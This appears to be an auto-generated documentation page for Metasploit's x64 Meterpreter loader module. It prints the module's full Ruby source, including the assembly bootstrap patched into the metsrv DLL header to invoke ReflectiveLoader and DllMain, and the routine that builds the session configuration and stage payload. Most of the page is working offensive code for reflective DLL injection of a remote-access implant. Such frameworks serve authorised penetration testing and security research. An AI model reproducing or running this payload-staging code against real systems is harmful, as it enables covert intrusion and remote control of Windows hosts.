Module: Msf::Payload::Windows::MeterpreterLoader_x64

Includes:
Msf::Payload::Windows, ReflectiveDLLLoader
Defined in:
lib/msf/core/payload/windows/x64/meterpreter_loader.rb

Constant Summary

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#asm_invoke_metsrv(opts = {}) ⇒ Object


37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader.rb', line 37

def asm_invoke_metsrv(opts={})
  asm = %Q^
      ; prologue
        db 0x4d, 0x5a         ; 'MZ' = "pop r10"
        push r10              ; back to where we started
        push rbp              ; save rbp
        mov rbp, rsp          ; set up a new stack frame
        sub rsp, 32           ; allocate some space for calls.
        and rsp, ~0xF         ; Ensure RSP is 16 byte aligned
      ; GetPC
        call $+5              ; relative call to get location
        pop rbx               ; pop return value
      ; Invoke ReflectiveLoader()
        ; add the offset to ReflectiveLoader()
        add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}
        call rbx              ; invoke ReflectiveLoader()
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
        ; offset from ReflectiveLoader() to the end of the DLL
        add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
  ^

  unless opts[:stageless] || opts[:force_write_handle] == true
    asm << %Q^
        ; store the comms socket or handle
        mov [rbx], rdi
    ^
  end

  asm << %Q^
        mov r8, rbx           ; r8 points to the extension list
        push 4                ; push up 4, indicate that we have attached
        pop rdx               ; pop 4 into rdx
        call rax              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
  ^
end

#generate_config(opts = {}) ⇒ Object


77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader.rb', line 77

def generate_config(opts={})
  ds = opts[:datastore] || datastore
  opts[:uuid] ||= generate_payload_uuid

  # create the configuration block, which for staged connections is really simple.
  config_opts = {
    arch:              opts[:uuid].arch,
    null_session_guid: opts[:null_session_guid] == true,
    exitfunk:          ds[:exit_func] || ds['EXITFUNC'],
    expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
    uuid:              opts[:uuid],
    transports:        opts[:transport_config] || [transport_config(opts)],
    extensions:        [],
    stageless:         opts[:stageless] == true
  }

  # create the configuration instance based off the parameters
  config = Rex::Payloads::Meterpreter::Config.new(config_opts)

  # return the binary version of it
  config.to_b
end

#initialize(info = {}) ⇒ Object


21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader.rb', line 21

def initialize(info = {})
  super(update_info(info,
    'Name'          => 'Reflective DLL Injection',
    'Description'   => 'Inject a DLL via a reflective loader',
    'Author'        => [ 'sf', 'OJ Reeves' ],
    'References'    => [
      [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
      [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
    ],
    'Platform'      => 'win',
    'Arch'          => ARCH_X64,
    'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi -https' },
    'Stage'         => { 'Payload'   => "" }
    ))
end

#stage_meterpreter(opts = {}) ⇒ Object


100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader.rb', line 100

def stage_meterpreter(opts={})
  # Exceptions will be thrown by the mixin if there are issues.
  dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll'))

  asm_opts = {
    rdi_offset: offset,
    length:     dll.length,
    stageless:  opts[:stageless] == true
  }

  asm = asm_invoke_metsrv(asm_opts)

  # generate the bootstrap asm
  bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string

  # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
  if bootstrap.length > 62
    raise RuntimeError, "Meterpreter loader (x64) generated an oversized bootstrap!"
  end

  # patch the bootstrap code into the dll's DOS header...
  dll[ 0, bootstrap.length ] = bootstrap

  dll
end

#stage_payload(opts = {}) ⇒ Object


73
74
75
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader.rb', line 73

def stage_payload(opts={})
  stage_meterpreter(opts) + generate_config(opts)
end